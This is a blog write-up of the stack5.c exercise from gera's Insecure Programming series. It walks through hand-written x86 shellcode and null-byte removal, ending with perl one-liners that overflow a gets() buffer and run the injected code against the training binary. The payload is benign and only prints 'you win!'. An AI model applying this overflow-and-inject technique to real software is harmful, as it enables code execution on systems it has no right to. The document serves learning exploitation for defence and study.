Insecure Programming by Example: shellcode & stack5.c

Introduction

Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);
        gets(buf);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");
}

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited. And the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straight forward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.

Shellc0dage

There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are very many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation‘s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls.  Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and return. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.

The next layer up is kernel system calls. System calls are convenient pointers to groups of assembly instructions (implemented as a system library typically in /lib) that “do stuff” with the given arguments, but they are not inherent to the x86 processor, rather they are inherent to the kerneland operating system that you are using at the time. They invariably are implemented in assembly (I suppose everything is, eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls at all (except through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, implemented through the various header files located typically in /usr/include on your average Linux distribution. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C, and implemented in libc, accessible to all processes at a predictable location in memory.

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on, in the meantime if you want to do some extracurricular reading, I would say a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago, it’s a bit above my head but it will serve you well if you ever need to look something up…ever.  If you want a more gentle introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike, I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. This is not super important for the gets() function, but if you are using something like strcpy() in the future or something else null terminated to get your shellcode into memory it will prematurely terminate the function.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.

Assembly code can be written using mnemonics, which are basically English-like direct correlations to a one-byte number that is the actual machine language that the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free version called the Netwide Assembler.

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print with newline at the end

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

_start:
; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; Put the address of the string pointer into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

What this code does is uses a trick of the call instruction within assembly to place the next address following the call onto the stack, which immediately after the call is popped back off of the stack into the ECX register. That address is used as a pointer to the string that we want to print.

This code we’ll want to translate not the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll use nasm without any arguments concerning the format parameter, then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80 byte buffer we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  |.....you win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
0000002d
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include newlines in our printed string, because they will prematurely terminate the gets() function. If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed down version of the shellcode, that uses various techniques such as high-and-low bytes of 16-bit registers, XORing registers against themselves to zero out 32-bit registers prior to instruction execution, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory using a two’s compliment memory address to avoid more null bytes. It also eliminates the 0x0a and 0x0d newline or carriage return bytes as they would kill the gets() function prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.

And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-( ). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!

2 Trackbacks

  1. [...] upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use [...]

  2. By 2010 in review « mishou.org on January 2, 2011 at 10:15 am

    [...] Insecure Programming by Example: shellcode & stack5.c December 2009 1 comment [...]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: